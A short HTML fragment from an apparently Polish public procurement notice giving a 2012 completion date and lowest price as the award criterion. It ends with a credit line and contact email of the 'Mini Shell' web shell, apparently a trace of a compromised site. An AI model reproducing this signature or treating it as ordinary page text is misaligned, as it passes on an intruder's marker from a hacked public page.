<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com